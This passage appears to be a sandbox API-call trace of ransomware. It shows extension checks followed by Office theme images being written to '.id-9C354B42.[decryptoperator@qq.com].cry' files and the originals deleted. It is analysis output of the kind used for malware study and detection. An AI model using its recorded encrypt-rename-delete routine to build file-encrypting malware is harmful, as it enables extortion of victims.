(lpString=".bz2") returned 4 [0048.231] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.231] lstrlenW (lpString=".7z") returned 3 [0048.231] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.231] lstrlenW (lpString=".dbf") returned 4 [0048.231] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.231] lstrlenW (lpString=".1cd") returned 4 [0048.231] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.231] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 74 [0048.231] lstrlenW (lpString=".jpg") returned 4 [0048.231] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.231] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0048.231] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.231] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0048.232] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=2527) returned 1 [0048.232] CloseHandle (hObject=0x1bc) returned 1 [0048.232] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 0x20 [0048.232] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.232] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0048.238] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.238] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.238] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0048.332] GetLastError () returned 0x0 [0048.332] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x9df, lpOverlapped=0x0) returned 1 [0048.509] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x9e0, lpOverlapped=0x0) returned 1 [0048.510] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.510] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0048.510] SetEndOfFile (hFile=0x184) returned 1 [0048.510] CloseHandle (hObject=0x184) returned 1 [0048.510] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.510] SetEndOfFile (hFile=0x1bc) returned 1 [0048.511] CloseHandle (hObject=0x1bc) returned 1 [0048.511] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.511] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\spring\\preview.gif")) returned 1 [0048.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.513] lstrlenW (lpString=".doc") returned 4 [0048.513] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.513] lstrlenW (lpString=".docx") returned 5 [0048.513] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.513] lstrlenW (lpString=".pdf") returned 4 [0048.513] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.513] lstrlenW (lpString=".xls") returned 4 [0048.513] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.513] lstrlenW (lpString=".xlsx") returned 5 [0048.513] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.513] lstrlenW (lpString=".ppt") returned 4 [0048.513] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.513] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.513] lstrlenW (lpString=".zip") returned 4 [0048.513] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.513] lstrlenW (lpString=".rar") returned 4 [0048.514] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.514] lstrlenW (lpString=".bz2") returned 4 [0048.514] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.514] lstrlenW (lpString=".7z") returned 3 [0048.514] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.514] lstrlenW (lpString=".dbf") returned 4 [0048.514] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.514] lstrlenW (lpString=".1cd") returned 4 [0048.514] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.514] lstrlenW (lpString=".jpg") returned 4 [0048.514] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.514] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.514] lstrlenW (lpString=".doc") returned 4 [0048.514] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0048.520] lstrlenW (lpString=".docx") returned 5 [0048.521] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0048.521] lstrlenW (lpString=".pdf") returned 4 [0048.521] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0048.521] lstrlenW (lpString=".xls") returned 4 [0048.521] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0048.521] lstrlenW (lpString=".xlsx") returned 5 [0048.521] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0048.521] lstrlenW (lpString=".ppt") returned 4 [0048.521] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0048.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.521] lstrlenW (lpString=".zip") returned 4 [0048.521] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0048.521] lstrlenW (lpString=".rar") returned 4 [0048.521] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0048.521] lstrlenW (lpString=".bz2") returned 4 [0048.521] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0048.521] lstrlenW (lpString=".7z") returned 3 [0048.521] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0048.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.521] lstrlenW (lpString=".dbf") returned 4 [0048.521] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0048.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.521] lstrlenW (lpString=".1cd") returned 4 [0048.521] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0048.521] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 74 [0048.521] lstrlenW (lpString=".jpg") returned 4 [0048.521] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0048.521] lstrcmpiW (lpString1=".PNG", lpString2=".cry") returned 1 [0048.521] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0048.521] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0048.522] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=18380) returned 1 [0048.522] CloseHandle (hObject=0x1bc) returned 1 [0048.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 0x20 [0048.522] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0048.522] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.522] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.522] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0048.522] GetLastError () returned 0x0 [0048.522] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x47cc, lpOverlapped=0x0) returned 1 [0048.642] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x47d0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x47d0, lpOverlapped=0x0) returned 1 [0048.643] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0048.643] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0048.643] SetEndOfFile (hFile=0x184) returned 1 [0048.643] CloseHandle (hObject=0x184) returned 1 [0048.643] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.644] SetEndOfFile (hFile=0x1bc) returned 1 [0048.644] CloseHandle (hObject=0x1bc) returned 1 [0048.644] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0048.645] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\studio\\thmbnail.png")) returned 1 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.645] lstrlenW (lpString=".doc") returned 4 [0048.645] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.645] lstrlenW (lpString=".docx") returned 5 [0048.645] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.645] lstrlenW (lpString=".pdf") returned 4 [0048.645] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.645] lstrlenW (lpString=".xls") returned 4 [0048.645] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.645] lstrlenW (lpString=".xlsx") returned 5 [0048.645] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.645] lstrlenW (lpString=".ppt") returned 4 [0048.645] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.645] lstrlenW (lpString=".zip") returned 4 [0048.645] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.645] lstrlenW (lpString=".rar") returned 4 [0048.645] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.645] lstrlenW (lpString=".bz2") returned 4 [0048.645] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.645] lstrlenW (lpString=".7z") returned 3 [0048.645] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.645] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.645] lstrlenW (lpString=".dbf") returned 4 [0048.646] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.646] lstrlenW (lpString=".1cd") returned 4 [0048.646] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.646] lstrlenW (lpString=".jpg") returned 4 [0048.646] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.646] lstrlenW (lpString=".doc") returned 4 [0048.646] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0048.646] lstrlenW (lpString=".docx") returned 5 [0048.646] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0048.646] lstrlenW (lpString=".pdf") returned 4 [0048.646] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0048.646] lstrlenW (lpString=".xls") returned 4 [0048.646] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0048.646] lstrlenW (lpString=".xlsx") returned 5 [0048.646] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0048.646] lstrlenW (lpString=".ppt") returned 4 [0048.646] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.646] lstrlenW (lpString=".zip") returned 4 [0048.646] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0048.646] lstrlenW (lpString=".rar") returned 4 [0048.646] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0048.646] lstrlenW (lpString=".bz2") returned 4 [0048.646] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0048.646] lstrlenW (lpString=".7z") returned 3 [0048.646] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.646] lstrlenW (lpString=".dbf") returned 4 [0048.646] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.646] lstrlenW (lpString=".1cd") returned 4 [0048.646] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0048.646] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\STUDIO\\THMBNAIL.PNG") returned 75 [0048.647] lstrlenW (lpString=".jpg") returned 4 [0048.647] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0048.647] lstrcmpiW (lpString1=".GIF", lpString2=".cry") returned 1 [0048.647] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0048.647] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0048.647] GetFileSizeEx (in: hFile=0x1bc, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=4991) returned 1 [0048.647] CloseHandle (hObject=0x1bc) returned 1 [0048.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 0x20 [0048.647] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0048.647] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1bc [0048.647] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.647] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0048.648] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0048.927] GetLastError () returned 0x0 [0048.927] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x137f, lpOverlapped=0x0) returned 1 [0049.015] WriteFile (in: hFile=0x20c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x1380, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1380, lpOverlapped=0x0) returned 1 [0049.016] ReadFile (in: hFile=0x1bc, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0049.016] WriteFile (in: hFile=0x20c, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xea, lpOverlapped=0x0) returned 1 [0049.016] SetEndOfFile (hFile=0x20c) returned 1 [0049.016] CloseHandle (hObject=0x20c) returned 1 [0049.016] SetFilePointerEx (in: hFile=0x1bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0049.016] SetEndOfFile (hFile=0x1bc) returned 1 [0049.017] CloseHandle (hObject=0x1bc) returned 1 [0049.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0049.017] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\sumipntg\\preview.gif")) returned 1 [0049.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.018] lstrlenW (lpString=".doc") returned 4 [0049.018] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.018] lstrlenW (lpString=".docx") returned 5 [0049.018] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.018] lstrlenW (lpString=".pdf") returned 4 [0049.018] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.018] lstrlenW (lpString=".xls") returned 4 [0049.018] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.018] lstrlenW (lpString=".xlsx") returned 5 [0049.018] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.018] lstrlenW (lpString=".ppt") returned 4 [0049.018] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.018] lstrlenW (lpString=".zip") returned 4 [0049.018] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.018] lstrlenW (lpString=".rar") returned 4 [0049.018] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0049.018] lstrlenW (lpString=".bz2") returned 4 [0049.018] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0049.019] lstrlenW (lpString=".7z") returned 3 [0049.019] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0049.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.019] lstrlenW (lpString=".dbf") returned 4 [0049.019] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0049.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.019] lstrlenW (lpString=".1cd") returned 4 [0049.019] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0049.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.019] lstrlenW (lpString=".jpg") returned 4 [0049.019] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0049.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.019] lstrlenW (lpString=".doc") returned 4 [0049.019] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0049.019] lstrlenW (lpString=".docx") returned 5 [0049.019] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0049.019] lstrlenW (lpString=".pdf") returned 4 [0049.019] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0049.019] lstrlenW (lpString=".xls") returned 4 [0049.019] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0049.019] lstrlenW (lpString=".xlsx") returned 5 [0049.019] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0049.019] lstrlenW (lpString=".ppt") returned 4 [0049.019] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0049.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SUMIPNTG\\PREVIEW.GIF") returned 76 [0049.019] lstrlenW (lpString=".zip") returned 4 [0049.019] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0049.019] lstrlenW (lpString=".rar") 